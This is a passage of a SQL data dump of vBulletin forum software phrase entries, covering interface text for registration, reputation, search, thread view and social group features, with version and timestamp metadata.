(37159, -1, 'register_at_x', 'register', 'Register at {1}', 'vbulletin', '', 0, ''),
(37160, -1, 'registration', 'register', 'Registration', 'vbulletin', '', 0, ''),
(37161, -1, 'registration_image', 'register', 'Registration Image', 'vbulletin', '', 0, ''),
(37162, -1, 'relation_to_child', 'register', 'Relation to Child', 'vbulletin', '', 0, ''),
(37163, -1, 'required_information', 'register', 'Required Information', 'vbulletin', '', 0, ''),
(37164, -1, 'select_a_day', 'register', 'Select a day', 'vbulletin', 'vBulletin Solutions', 1144883336, '3.6.0 Beta 1'),
(37165, -1, 'select_a_month', 'register', 'Select a month', 'vbulletin', '', 0, ''),
(37166, -1, 'sign_form_and_send_with_privacy', 'register', 'Please sign the form below and send it to us. \r\n I have reviewed the information my child has supplied and I have read the Privacy Policy ({1}) for the web site.\r\n I understand that the profile information may be changed by a using a password.\r\n I understand that I may ask for this registration profile be removed entirely.', 'vbulletin', 'vBulletin Solutions', 1198801110, '3.7.0 Beta 4'),
(37167, -1, 'sign_form_and_send_without_privacy', 'register', 'Please sign the form below and send it to us. \r\n I have reviewed the information my child has supplied.\r\n I understand that the profile information may be changed by a using a password.\r\n I understand that I may ask for this registration profile be removed entirely.', 'vbulletin', 'vBulletin Solutions', 1198801141, '3.7.0 Beta 4'),
(37168, -1, 'telephone_number', 'register', 'Telephone Number', 'vbulletin', '', 0, ''),
(37169, -1, 'to_post_must_first_register', 'register', 'In order to be able to post messages on the {1} forums, you must first register. \r\n Please enter your desired user name, your email address and other required details in the form below.', 'vbulletin', '', 0, ''),
(37170, -1, 'to_proceed_must_agree', 'register', 'In order to proceed, you must agree with the following rules:', 'vbulletin', '', 0, ''),
(37171, -1, 'until_receive_signed_form', 'register', 'Note Until we receive a signed permission form from your parent or guardian you will be unable to post messages on this forum.
\r\n All of the information you provide on this page will be emailed to you and your parent or guardian with instructions for sending in the approval.
', 'vbulletin', '', 0, ''),
(37172, -1, 'username_is_valid', 'register', 'Username is valid and not in use.', 'vbulletin', 'vBulletin Solutions', 1218623657, '3.8.0 Alpha 1'),
(37173, -1, 'x_rules', 'register', '{1} Rules', 'vbulletin', '', 0, ''),
(37174, -1, 'yes_hides_email_icq_etc', 'register', 'Selecting \'yes\' hides email, ICQ number, AIM ID, Yahoo ID and MSN ID in profile and also hides you in \'Logged In Users\' list.', 'vbulletin', '', 0, ''),
(37175, -1, 'add_new_reputation_level', 'reputation', 'Add New Reputation Level', 'vbulletin', '', 0, ''),
(37176, -1, 'add_to_reputation', 'reputation', 'Add to Reputation', 'vbulletin', '', 0, ''),
(37177, -1, 'are_you_sure_want_to_delete_reputation_x', 'reputation', 'Are you sure you want to delete reputation {1}?', 'vbulletin', '', 0, ''),
(37178, -1, 'are_you_sure_you_want_to_delete_the_reputation_level_x', 'reputation', 'Are you sure you want to delete the Reputation Level: \'{1}\'?', 'vbulletin', '', 0, ''),
(37179, -1, 'comments_on_this_post', 'reputation', 'Comments on this Post', 'vbulletin', '', 0, ''),
(37180, -1, 'edit_reputation', 'reputation', 'Edit Reputation', 'vbulletin', '', 0, ''),
(37181, -1, 'even', 'reputation', 'Even', 'vbulletin', '', 0, ''),
(37182, -1, 'extremely_negative', 'reputation', 'Extremely Negative', 'vbulletin', '', 0, ''),
(37183, -1, 'extremely_positive', 'reputation', 'Extremely Positive', 'vbulletin', '', 0, ''),
(37184, -1, 'i_approve', 'reputation', 'I approve', 'vbulletin', '', 0, ''),
(37185, -1, 'i_disapprove', 'reputation', 'I disapprove', 'vbulletin', '', 0, ''),
(37186, -1, 'leftby', 'reputation', 'Left By', 'vbulletin', '', 0, ''),
(37187, -1, 'leftfor', 'reputation', 'Left For', 'vbulletin', '', 0, ''),
(37188, -1, 'minimum_reputation_level', 'reputation', 'Minimum Reputation Level', 'vbulletin', '', 0, ''),
(37189, -1, 'negative', 'reputation', 'Negative', 'vbulletin', '', 0, ''),
(37190, -1, 'positive', 'reputation', 'Positive', 'vbulletin', '', 0, ''),
(37191, -1, 'reputation_on_post_is_x', 'reputation', 'Your reputation on this post is {2}.', 'vbulletin', '', 0, ''),
(37192, -1, 'somewhat_negative', 'reputation', 'Somewhat Negative', 'vbulletin', '', 0, ''),
(37193, -1, 'somewhat_positive', 'reputation', 'Somewhat Positive', 'vbulletin', '', 0, ''),
(37194, -1, 'user_reputation_manager', 'reputation', 'User Reputation Manager', 'vbulletin', '', 0, ''),
(37195, -1, 'very_negative', 'reputation', 'Very Negative', 'vbulletin', '', 0, ''),
(37196, -1, 'very_positive', 'reputation', 'Very Positive', 'vbulletin', '', 0, ''),
(37197, -1, 'what_do_you_think_of_xs_post', 'reputation', 'What do you think of {1}\'s post?', 'vbulletin', '', 0, ''),
(37198, -1, 'x_reputation_comments_page_y_z', 'reputation', '{1} Reputation Comments (Page {2}/{3})', 'vbulletin', '', 0, ''),
(37199, -1, 'you_have_x_reputation_points', 'reputation', 'You have {1} Reputation point(s).', 'vbulletin', 'vBulletin Solutions', 1149791689, '3.6.0 Beta 2'),
(37200, -1, 'your_comments_on_this_post', 'reputation', 'Your comments on this post', 'vbulletin', '', 0, ''),
(37201, -1, 'a_month_ago', 'search', 'A Month Ago', 'vbulletin', '', 0, ''),
(37202, -1, 'a_week_ago', 'search', 'A Week Ago', 'vbulletin', '', 0, ''),
(37203, -1, 'a_year_ago', 'search', 'A Year Ago', 'vbulletin', '', 0, ''),
(37204, -1, 'all_posts_below_here', 'search', 'All posts below here were posted before your last visit.', 'vbulletin', '', 0, ''),
(37205, -1, 'all_threads_below_here', 'search', 'The threads below have not been updated since your last visit or since forums have been marked read.', 'vbulletin', 'vBulletin Solutions', 1149792250, '3.6.0 Beta 2'),
(37206, -1, 'all_threads_below_here_unread', 'search', 'The threads below have not been updated since your last visit but still contain unread posts.', 'vbulletin', 'vBulletin Solutions', 1149792248, '3.6.0 Beta 2'),
(37207, -1, 'also_search_in_child_forums', 'search', 'Also search in child forums', 'vbulletin', '', 0, ''),
(37208, -1, 'and_child_forums', 'search', 'and child forums', 'vbulletin', '', 0, ''),
(37209, -1, 'and_newer', 'search', 'and Newer', 'vbulletin', '', 0, ''),
(37210, -1, 'and_older', 'search', 'and Older', 'vbulletin', '', 0, ''),
(37211, -1, 'any_date', 'search', 'Any Date', 'vbulletin', '', 0, ''),
(37212, -1, 'at_least', 'search', 'At Least', 'vbulletin', '', 0, ''),
(37213, -1, 'at_most', 'search', 'At Most', 'vbulletin', '', 0, ''),
(37214, -1, 'clear_search_preferences', 'search', 'Clear Search Preferences', 'vbulletin', '', 0, ''),
(37215, -1, 'deleted_post', 'search', 'Deleted Post', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(37216, -1, 'do_not_use_cached_results', 'search', 'Do not use cached results', 'vbulletin', 'vBulletin Solutions', 1172491139, '3.6.5'),
(37217, -1, 'errors_occured_with_search', 'search', 'The following errors occurred with your search', 'vbulletin', 'vBulletin Solutions', 1155581034, '3.6.1'),
(37218, -1, 'exact_name', 'search', 'Exact name', 'vbulletin', '', 0, ''),
(37219, -1, 'fields_on_form_optional', 'search', 'All fields on this form are optional. Most fields will accept a partial input (for example, you could enter Jo into the \'User Name\' field in order to find users called Jo hn, Jo e, Jo seph and Jo lene).', 'vbulletin', '', 0, ''),
(37220, -1, 'find_posts_from', 'search', 'Find Posts from', 'vbulletin', '', 0, ''),
(37221, -1, 'find_threads_started_by_user', 'search', 'Find Threads Started by User', 'vbulletin', '', 0, ''),
(37222, -1, 'find_threads_with', 'search', 'Find Threads with', 'vbulletin', '', 0, ''),
(37223, -1, 'find_threads_with_prefix', 'search', 'Find Threads with Prefix', 'vbulletin', 'vBulletin Solutions', 1190042608, '3.7.0 Beta 1'),
(37224, -1, 'help', 'search', 'Help', 'vbulletin', '', 0, ''),
(37225, -1, 'in_ascending_order', 'search', 'in Ascending Order', 'vbulletin', '', 0, ''),
(37226, -1, 'in_descending_order', 'search', 'in Descending Order', 'vbulletin', '', 0, ''),
(37227, -1, 'is_after', 'search', 'is After', 'vbulletin', '', 0, ''),
(37228, -1, 'is_before', 'search', 'is Before', 'vbulletin', '', 0, ''),
(37229, -1, 'is_greater_than_or_equal_to', 'search', 'is Greater than or Equal to', 'vbulletin', '', 0, ''),
(37230, -1, 'is_less_than', 'search', 'is Less than', 'vbulletin', '', 0, ''),
(37231, -1, 'key_words', 'search', 'Keyword(s)', 'vbulletin', 'vBulletin Solutions', 1213632802, '3.8.0 Alpha 1'),
(37232, -1, 'last_posting_date', 'search', 'Last Posting Date', 'vbulletin', '', 0, ''),
(37233, -1, 'moderated_post', 'search', 'Moderated Post', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(37234, -1, 'moderation', 'search', 'Moderation', 'vbulletin', '', 0, ''),
(37235, -1, 'no_unread_threads', 'search', 'There are no unread threads.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(37236, -1, 'number_of_users_perpage', 'search', 'Number of users per-page', 'vbulletin', '', 0, ''),
(37237, -1, 'or_no_prefix', 'search', 'or no prefix', 'vbulletin', 'vBulletin Solutions', 1190042552, '3.7.0 Beta 1'),
(37238, -1, 'order_results_by', 'search', 'Order Results By', 'vbulletin', '', 0, ''),
(37239, -1, 'please_use_format', 'search', 'Please use yyyy-mm-dd format', 'vbulletin', '', 0, ''),
(37240, -1, 'please_use_format_yyyymmdd_hhmmss', 'search', 'Please use format yyyy-mm-dd hh:mm:ss', 'vbulletin', '', 0, ''),
(37241, -1, 'posts_from_last_day', 'search', 'Posts From Last Day', 'vbulletin', '', 0, ''),
(37242, -1, 'posts_made_by', 'search', 'Posts Made By', 'vbulletin', '', 0, ''),
(37243, -1, 'relevancy', 'search', 'Relevancy', 'vbulletin', '', 0, ''),
(37244, -1, 'save_search_preferences', 'search', 'Save Search Preferences', 'vbulletin', '', 0, ''),
(37245, -1, 'search_all_open_forums', 'search', 'Search All Open Forums', 'vbulletin', '', 0, ''),
(37246, -1, 'search_by_key_word', 'search', 'Search by Keyword', 'vbulletin', 'vBulletin Solutions', 1213632822, '3.8.0 Alpha 1'),
(37247, -1, 'search_by_tag', 'search', 'Search by Tag', 'vbulletin', 'vBulletin Solutions', 1190904527, '3.7.0 Beta 1'),
(37248, -1, 'search_by_user_name', 'search', 'Search by User Name', 'vbulletin', '', 0, ''),
(37249, -1, 'search_entire_posts', 'search', 'Search Entire Posts', 'vbulletin', '', 0, ''),
(37250, -1, 'search_in_forums', 'search', 'Search in Forum(s)', 'vbulletin', '', 0, ''),
(37251, -1, 'search_now', 'search', 'Search Now', 'vbulletin', '', 0, ''),
(37252, -1, 'search_options', 'search', 'Search Options', 'vbulletin', '', 0, ''),
(37253, -1, 'search_subscribed_forums', 'search', 'Search Subscribed Forums', 'vbulletin', '', 0, ''),
(37254, -1, 'search_tag_cloud', 'search', 'Search Tag Cloud', 'vbulletin', 'vBulletin Solutions', 1191579522, '3.7.0 Beta 1'),
(37255, -1, 'search_thread', 'search', 'Search Thread', 'vbulletin', 'vBulletin Solutions', 1156452931, '3.6.1'),
(37256, -1, 'search_took_x_seconds', 'search', 'Search took {1} seconds.', 'vbulletin', '', 0, ''),
(37257, -1, 'search_took_x_seconds_gen_y_mins', 'search', 'Search took {1} seconds; generated {2} minute(s) ago.', 'vbulletin', '', 0, ''),
(37258, -1, 'search_type', 'search', 'Search Type', 'vbulletin', '', 0, ''),
(37259, -1, 'show_results_as', 'search', 'Show Results as', 'vbulletin', '', 0, ''),
(37260, -1, 'sort_results_by', 'search', 'Sort Results by', 'vbulletin', '', 0, ''),
(37261, -1, 'spam_post', 'search', 'Spam Post', 'vbulletin', 'vBulletin Solutions', 1193049740, '3.7.0 Beta 1'),
(37262, -1, 'tag_cloud', 'search', 'Tag Cloud', 'vbulletin', 'vBulletin Solutions', 1196698375, '3.7.0 Beta 1'),
(37263, -1, 'these_are_the_x_most_searched_thread_tags', 'search', 'These are the {1} most-searched-for thread tags', 'vbulletin', 'vBulletin Solutions', 1191588641, '3.7.0 Beta 1'),
(37264, -1, 'these_are_the_x_most_used_thread_tags', 'search', 'These are the {1} most used thread tags', 'vbulletin', 'vBulletin Solutions', 1196698517, '3.7.0 Beta 1'),
(37265, -1, 'thread_start_date', 'search', 'Thread Start Date', 'vbulletin', '', 0, ''),
(37266, -1, 'thread_titles_only_search', 'search', 'You may return further results if you perform a Thread Titles Only search.', 'vbulletin', 'vBulletin Solutions', 1170375631, '3.6.5'),
(37267, -1, 'threads_started_by', 'search', 'Threads Started By', 'vbulletin', '', 0, ''),
(37268, -1, 'threads_tagged_with_x', 'search', 'Threads Tagged with {1} ', 'vbulletin', 'vBulletin Solutions', 1203428241, '3.7.0 Beta 6'),
(37269, -1, 'threads_tagged_with_x_title', 'search', 'Threads Tagged with {1}', 'vbulletin', 'vBulletin Solutions', 1205146769, '3.7.0 Release Candidate 1'),
(37270, -1, 'words_very_common', 'search', 'The following words are either very common, too long, or too short and were not included in your search', 'vbulletin', '', 0, ''),
(37271, -1, 'x_deleted_posts', 'search', '{1} Deleted Post(s)', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(37272, -1, 'x_moderated_posts', 'search', '{1} Moderated Post(s)', 'vbulletin', '', 0, ''),
(37273, -1, 'x_months_ago', 'search', '{1} Months Ago', 'vbulletin', '', 0, ''),
(37274, -1, 'you_can_only_search_thread_titles', 'search', 'You can only search in thread titles in the forums marked with an * . Please select \'Search Thread Titles Only\' to include these forums in your search. ', 'vbulletin', 'vBulletin Solutions', 1170366080, '3.6.5'),
(37275, -1, 'your_last_visit', 'search', 'Your Last Visit', 'vbulletin', '', 0, ''),
(37276, -1, 'add_a_poll', 'showthread', 'Add a Poll', 'vbulletin', '', 0, ''),
(37277, -1, 'add_a_poll_to_this_thread', 'showthread', 'Add a Poll to this Thread', 'vbulletin', '', 0, ''),
(37278, -1, 'admin_tools', 'showthread', 'Moderation Tools', 'vbulletin', 'vBulletin Solutions', 1147889560, '3.6.0 Beta 1'),
(37279, -1, 'already_rated_this_thread', 'showthread', 'You have already rated this thread', 'vbulletin', '', 0, ''),
(37280, -1, 'approve_thread', 'showthread', 'Approve Thread', 'vbulletin', 'vBulletin Solutions', 1212676405, '3.8.0 Alpha 1'),
(37281, -1, 'average', 'showthread', 'Average', 'vbulletin', '', 0, ''),
(37282, -1, 'bad', 'showthread', 'Bad', 'vbulletin', '', 0, ''),
(37283, -1, 'bookmarks', 'showthread', 'Bookmarks', 'vbulletin', 'vBulletin Solutions', 1214395154, '3.7.1'),
(37284, -1, 'choose_a_rating', 'showthread', 'Choose a rating', 'vbulletin', '', 0, ''),
(37285, -1, 'click_quick_reply_icon', 'showthread', 'Please click one of the Quick Reply icons in the posts above to activate Quick Reply.', 'vbulletin', '', 0, ''),
(37286, -1, 'close_thread', 'showthread', 'Close Thread', 'vbulletin', '', 0, ''),
(37287, -1, 'copy_thread', 'showthread', 'Copy Thread', 'vbulletin', 'vBulletin Solutions', 1151447312, '3.6.0 Beta 4'),
(37288, -1, 'deleted_post', 'showthread', 'Deleted Post', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(37289, -1, 'display_modes', 'showthread', 'Display Modes', 'vbulletin', '', 0, ''),
(37290, -1, 'email_this_page', 'showthread', 'Email this Page', 'vbulletin', '', 0, ''),
(37291, -1, 'excellent', 'showthread', 'Excellent', 'vbulletin', '', 0, ''),
(37292, -1, 'good', 'showthread', 'Good', 'vbulletin', '', 0, ''),
(37293, -1, 'hybrid_mode', 'showthread', 'Hybrid Mode', 'vbulletin', '', 0, ''),
(37294, -1, 'linear_mode', 'showthread', 'Linear Mode', 'vbulletin', '', 0, ''),
(37295, -1, 'moderated_post', 'showthread', 'Moderated Post', 'vbulletin', '', 0, ''),
(37296, -1, 'moderation', 'showthread', 'Moderation', 'vbulletin', '', 0, ''),
(37297, -1, 'more_replies_below', 'showthread', 'More replies below current depth...', 'vbulletin', '', 0, ''),
(37298, -1, 'move_thread', 'showthread', 'Move Thread', 'vbulletin', 'vBulletin Solutions', 1151447322, '3.6.0 Beta 4'),
(37299, -1, 'next_post', 'showthread', 'Next Post', 'vbulletin', '', 0, ''),
(37300, -1, 'next_thread', 'showthread', 'Next Thread', 'vbulletin', '', 0, ''),
(37301, -1, 'open_thread', 'showthread', 'Open Thread', 'vbulletin', '', 0, ''),
(37302, -1, 'post_deleted', 'showthread', '(Post Deleted)', 'vbulletin', '', 0, ''),
(37303, -1, 'post_quick_reply', 'showthread', 'Post Quick Reply', 'vbulletin', '', 0, ''),
(37304, -1, 'posting_quick_reply_please_wait', 'showthread', 'Posting Quick Reply - Please Wait', 'vbulletin', '', 0, ''),
(37305, -1, 'prev_thread', 'showthread', 'Previous Thread', 'vbulletin', '', 0, ''),
(37306, -1, 'previous_post', 'showthread', 'Previous Post', 'vbulletin', '', 0, ''),
(37307, -1, 'quote_message_in_reply', 'showthread', 'Quote message in reply?', 'vbulletin', '', 0, ''),
(37308, -1, 'rate_this_thread', 'showthread', 'Rate This Thread', 'vbulletin', '', 0, ''),
(37309, -1, 'rating', 'showthread', 'Rating', 'vbulletin', '', 0, ''),
(37310, -1, 'remove_redirects', 'showthread', 'Remove Redirects', 'vbulletin', '', 0, ''),
(37311, -1, 'remove_text_formatting', 'showthread', 'Remove Text Formatting', 'vbulletin', '', 0, ''),
(37312, -1, 'search_this_thread', 'showthread', 'Search this Thread', 'vbulletin', '', 0, ''),
(37313, -1, 'show_printable_version', 'showthread', 'Show Printable Version', 'vbulletin', '', 0, ''),
(37314, -1, 'show_x_posts_on_one_page', 'showthread', 'Show {1} post(s) from this thread on one page', 'vbulletin', 'vBulletin Solutions', 1150509194, '3.6.0 Beta 3'),
(37315, -1, 'show_your_signature', 'showthread', 'Show your signature', 'vbulletin', '', 0, ''),
(37316, -1, 'similar_threads', 'showthread', 'Similar Threads', 'vbulletin', '', 0, ''),
(37317, -1, 'spam_post', 'showthread', 'Spam Post', 'vbulletin', 'vBulletin Solutions', 1193049715, '3.7.0 Beta 1'),
(37318, -1, 'split_thread', 'showthread', 'Split Thread', 'vbulletin', '', 0, ''),
(37319, -1, 'stick_thread', 'showthread', 'Stick Thread', 'vbulletin', '', 0, ''),
(37320, -1, 'submit_thread_to_x', 'showthread', 'Submit Thread to {1}', 'vbulletin', 'vBulletin Solutions', 1210106330, '3.7.1'),
(37321, -1, 'subscribe_to_this_thread', 'showthread', 'Subscribe to this Thread', 'vbulletin', '', 0, ''),
(37322, -1, 'switch_to_hybrid_mode', 'showthread', 'Switch to Hybrid Mode', 'vbulletin', '', 0, ''),
(37323, -1, 'switch_to_linear_mode', 'showthread', 'Switch to Linear Mode', 'vbulletin', '', 0, ''),
(37324, -1, 'switch_to_threaded_mode', 'showthread', 'Switch to Threaded Mode', 'vbulletin', '', 0, ''),
(37325, -1, 'terrible', 'showthread', 'Terrible', 'vbulletin', '', 0, ''),
(37326, -1, 'thread_tools', 'showthread', 'Thread Tools', 'vbulletin', '', 0, ''),
(37327, -1, 'threaded_mode', 'showthread', 'Threaded Mode', 'vbulletin', '', 0, ''),
(37328, -1, 'unapprove_thread', 'showthread', 'Unapprove Thread', 'vbulletin', 'vBulletin Solutions', 1212676426, '3.8.0 Alpha 1'),
(37329, -1, 'unstick_thread', 'showthread', 'Unstick Thread', 'vbulletin', '', 0, ''),
(37330, -1, 'unsubscribe_from_this_thread', 'showthread', 'Unsubscribe from this Thread', 'vbulletin', '', 0, ''),
(37331, -1, 'users_viewing_this_thread_x_y_z', 'showthread', 'Currently Active Users Viewing This Thread: {1} ({2} members and {3} guests) ', 'vbulletin', '', 0, ''),
(37332, -1, 'view_first_unread', 'showthread', 'View First Unread', 'vbulletin', '', 0, ''),
(37333, -1, 'view_single_post', 'showthread', 'View Single Post', 'vbulletin', '', 0, ''),
(37334, -1, 'you_rated_this_thread', 'showthread', 'You Rated this Thread', 'vbulletin', '', 0, ''),
(37335, -1, 'accept_social_group_transfer_x', 'socialgroups', 'You have been requested to take ownership of the Social Group {1}. \r\nWould you like to accept?', 'vbulletin', 'vBulletin Solutions', 1221138461, '3.8.0 Alpha 1'),
(37336, -1, 'add_new_category', 'socialgroups', 'Add New Category', 'vbulletin', 'vBulletin Solutions', 1215686846, '3.8.0 Alpha 1'),
(37337, -1, 'add_new_socialgroup_category', 'socialgroups', 'Add New Social Group Category', 'vbulletin', 'vBulletin Solutions', 1215685687, '3.8.0 Alpha 1'),
(37338, -1, 'add_pictures_to_group', 'socialgroups', 'Add Pictures to Group', 'vbulletin', 'vBulletin Solutions', 1195470031, '3.7.0 Beta 1'),
(37339, -1, 'add_pictures_to_this_group', 'socialgroups', 'Add pictures to this group!', 'vbulletin', 'vBulletin Solutions', 1195494188, '3.7.0 Beta 1'),
(37340, -1, 'all_groups', 'socialgroups', 'All Groups', 'vbulletin', 'vBulletin Solutions', 1217935791, '3.8.0 Alpha 1'),
(37341, -1, 'approve_discussions', 'socialgroups', 'Approve Discussions', 'vbulletin', 'vBulletin Solutions', 1212160014, '3.7.1'),
(37342, -1, 'are_you_sure_you_want_to_delete_category_x_y_groups', 'socialgroups', 'Are you sure you want to delete the social group category {1} ? \r\nIf you choose to delete this category, you must choose a different category into which the {2} social groups belonging to the {1} category will be moved.', 'vbulletin', 'vBulletin Solutions', 1215703760, '3.8.0 Alpha 1'),
(37343, -1, 'are_you_sure_you_want_to_delete_x_groups', 'socialgroups', 'Are you sure you want to delete {1} group(s)?', 'vbulletin', 'vBulletin Solutions', 1200321733, '3.7.0 Beta 4'),
(37344, -1, 'available_groups', 'socialgroups', 'Available Groups', 'vbulletin', 'vBulletin Solutions', 1192453518, '3.7.0 Beta 1'),
(37345, -1, 'bookmarks', 'socialgroups', 'Bookmarks', 'vbulletin', 'vBulletin Solutions', 1214395214, '3.7.1'),
(37346, -1, 'cancel_invitation', 'socialgroups', 'Cancel Invitation', 'vbulletin', 'vBulletin Solutions', 1196252843, '3.7.0 Beta 1'),
(37347, -1, 'cancel_join_request', 'socialgroups', 'Cancel Join Request', 'vbulletin', 'vBulletin Solutions', 1196173474, '3.7.0 Beta 1'),
(37348, -1, 'cancel_join_request_question', 'socialgroups', 'Cancel Join Request?', 'vbulletin', 'vBulletin Solutions', 1196173412, '3.7.0 Beta 1'),
(37349, -1, 'categories', 'socialgroups', 'Categories', 'vbulletin', 'vBulletin Solutions', 1217858812, '3.8.0 Alpha 1'),
(37350, -1, 'category', 'socialgroups', 'Category', 'vbulletin', 'vBulletin Solutions', 1218119234, '3.8.0 Alpha 1'),
(37351, -1, 'category_filter', 'socialgroups', 'Category Filter', 'vbulletin', 'vBulletin Solutions', 1215787541, '3.8.0 Alpha 1'),
(37352, -1, 'category_is', 'socialgroups', 'Category is', 'vbulletin', 'vBulletin Solutions', 1215685588, '3.8.0 Alpha 1'),
(37353, -1, 'category_name', 'socialgroups', 'Category Name', 'vbulletin', 'vBulletin Solutions', 1217946386, '3.8.0 Alpha 1'),
(37354, -1, 'confirm_cancel_join_group_x', 'socialgroups', 'Are you sure you wish to cancel your request to join the group \"{1}\"?', 'vbulletin', 'vBulletin Solutions', 1196173337, '3.7.0 Beta 1'),
(37355, -1, 'confirm_decline_join_group_x', 'socialgroups', 'Are you sure you wish to decline the invitation to join the group \"{1}\"?', 'vbulletin', 'vBulletin Solutions', 1196173891, '3.7.0 Beta 1'),
(37356, -1, 'confirm_delete_group_x', 'socialgroups', 'Are you sure you want to delete the group called \"{1}\"?', 'vbulletin', 'vBulletin Solutions', 1193231255, '3.7.0 Beta 1'),
(37357, -1, 'confirm_join_group_x', 'socialgroups', 'Are you sure you want to join the group called \"{1}\"?', 'vbulletin', 'vBulletin Solutions', 1193231276, '3.7.0 Beta 1'),
(37358, -1, 'confirm_leave_group_x', 'socialgroups', 'Are you sure you wish to leave the group called \"{1}\"?', 'vbulletin', 'vBulletin Solutions', 1193231308, '3.7.0 Beta 1'),
(37359, -1, 'confirm_remove_picture_group_x', 'socialgroups', 'Are you sure you want to remove this picture from the group \"{1}\"?', 'vbulletin', 'vBulletin Solutions', 1195471587, '3.7.0 Beta 1'),
(37360, -1, 'create_a_new_group', 'socialgroups', 'Create a New Group', 'vbulletin', 'vBulletin Solutions', 1193675620, '3.7.0 Beta 1'),
(37361, -1, 'create_group', 'socialgroups', 'Create Group', 'vbulletin', 'vBulletin Solutions', 1192529892, '3.7.0 Beta 1'),
(37362, -1, 'create_group_icon', 'socialgroups', 'Create Group Icon', 'vbulletin', 'vBulletin Solutions', 1226322443, '3.8.0 Beta 2'),
(37363, -1, 'creation_date_filter', 'socialgroups', 'Creation Date Filter', 'vbulletin', 'vBulletin Solutions', 1193144709, '3.7.0 Beta 1'),
(37364, -1, 'creation_date_is_after', 'socialgroups', 'Creation Date is After', 'vbulletin', 'vBulletin Solutions', 1200321815, '3.7.0 Beta 4'),
(37365, -1, 'creation_date_is_before', 'socialgroups', 'Creation Date is Before', 'vbulletin', 'vBulletin Solutions', 1200321829, '3.7.0 Beta 4'),
(37366, -1, 'current_group_icon', 'socialgroups', 'Current Group Icon', 'vbulletin', 'vBulletin Solutions', 1216132835, '3.8.0 Alpha 1'),
(37367, -1, 'custom_group_icon', 'socialgroups', 'Custom Group Icon', 'vbulletin', 'vBulletin Solutions', 1216133252, '3.8.0 Alpha 1'),
(37368, -1, 'date_is_after', 'socialgroups', 'Date is after', 'vbulletin', 'vBulletin Solutions', 1193144762, '3.7.0 Beta 1'),
(37369, -1, 'date_is_before', 'socialgroups', 'Date is Before', 'vbulletin', 'vBulletin Solutions', 1193144742, '3.7.0 Beta 1'),
(37370, -1, 'decline_join_invitation', 'socialgroups', 'Decline Invitation', 'vbulletin', 'vBulletin Solutions', 1196173921, '3.7.0 Beta 1'),
(37371, -1, 'decline_join_invitation_question', 'socialgroups', 'Decline Invitation?', 'vbulletin', 'vBulletin Solutions', 1196173929, '3.7.0 Beta 1'),
(37372, -1, 'delete_discussion', 'socialgroups', 'Delete Discussion', 'vbulletin', 'vBulletin Solutions', 1214231861, '3.7.1'),
(37373, -1, 'delete_discussion_check_appropriate_option', 'socialgroups', 'To delete this discussion, check the appropriate option below and then click the \'Delete this Message\' button.', 'vbulletin', 'vBulletin Solutions', 1214231666, '3.7.1'),
(37374, -1, 'delete_discussions', 'socialgroups', 'Delete Discussions', 'vbulletin', 'vBulletin Solutions', 1212159933, '3.7.1'),
(37375, -1, 'delete_group', 'socialgroups', 'Delete Group', 'vbulletin', 'vBulletin Solutions', 1192467324, '3.7.0 Beta 1'),
(37376, -1, 'delete_group_discussion', 'socialgroups', 'Delete Discussion', 'vbulletin', 'vBulletin Solutions', 1211468780, '3.7.1'),
(37377, -1, 'delete_group_question', 'socialgroups', 'Delete Group?', 'vbulletin', 'vBulletin Solutions', 1195748188, '3.7.0 Beta 1'),
(37378, -1, 'delete_selected_groups', 'socialgroups', 'Delete Selected Groups', 'vbulletin', 'vBulletin Solutions', 1200321848, '3.7.0 Beta 4'),
(37379, -1, 'deleted_selected_groups', 'socialgroups', 'Deleted Selected Groups', 'vbulletin', 'vBulletin Solutions', 1200321887, '3.7.0 Beta 4'),
(37380, -1, 'deleting_groups', 'socialgroups', 'Deleting groups', 'vbulletin', 'vBulletin Solutions', 1200321901, '3.7.0 Beta 4'),
(37381, -1, 'deleting_x', 'socialgroups', 'Deleting {1}...', 'vbulletin', 'vBulletin Solutions', 1200321915, '3.7.0 Beta 4'),
(37382, -1, 'deselect_all_discussions', 'socialgroups', 'Deselect All Discussions', 'vbulletin', 'vBulletin Solutions', 1212160125, '3.7.1'),
(37383, -1, 'discussion', 'socialgroups', 'Discussion', 'vbulletin', 'vBulletin Solutions', 1211468747, '3.7.1'),
(37384, -1, 'discussion_deleted_by_x', 'socialgroups', 'Discussion deleted by {2} .', 'vbulletin', 'vBulletin Solutions', 1212669929, '3.7.1'),
(37385, -1, 'discussion_hidden_x_on_ignore_list', 'socialgroups', 'This discussion is hidden because {1} is on your ignore list .', 'vbulletin', 'vBulletin Solutions', 1212079329, '3.7.1'),
(37386, -1, 'discussion_tools', 'socialgroups', 'Discussion Tools', 'vbulletin', 'vBulletin Solutions', 1213619883, '3.7.1'),
(37387, -1, 'do_not_delete_discussion', 'socialgroups', 'Do Not Delete Discussion', 'vbulletin', 'vBulletin Solutions', 1214231843, '3.7.1'),
(37388, -1, 'doleave', 'socialgroups', 'Leave Group?', 'vbulletin', 'vBulletin Solutions', 1192466920, '3.7.0 Beta 1'),
(37389, -1, 'edit_discussion', 'socialgroups', 'Edit Discussion', 'vbulletin', 'vBulletin Solutions', 1221755235, '3.8.0 Alpha 1'),
(37390, -1, 'edit_group', 'socialgroups', 'Edit Group', 'vbulletin', 'vBulletin Solutions', 1192534753, '3.7.0 Beta 1'),
(37391, -1, 'edit_group_icon', 'socialgroups', 'Edit Group Icon', 'vbulletin', 'vBulletin Solutions', 1216132803, '3.8.0 Alpha 1'),
(37392, -1, 'edit_message', 'socialgroups', 'Edit Message', 'vbulletin', 'vBulletin Solutions', 1221755189, '3.8.0 Alpha 1'),
(37393, -1, 'enable_albums', 'socialgroups', 'Enable Albums', 'vbulletin', 'vBulletin Solutions', 1204717794, '3.7.0 Beta 6'),
(37394, -1, 'enable_messages', 'socialgroups', 'Enable Messages', 'vbulletin', 'vBulletin Solutions', 1204718022, '3.7.0 Beta 6'),
(37395, -1, 'filter', 'socialgroups', 'Filter', 'vbulletin', 'vBulletin Solutions', 1193227281, '3.7.0 Beta 1'),
(37396, -1, 'find_groups_with', 'socialgroups', 'Find Groups With', 'vbulletin', 'vBulletin Solutions', 1193144843, '3.7.0 Beta 1'),
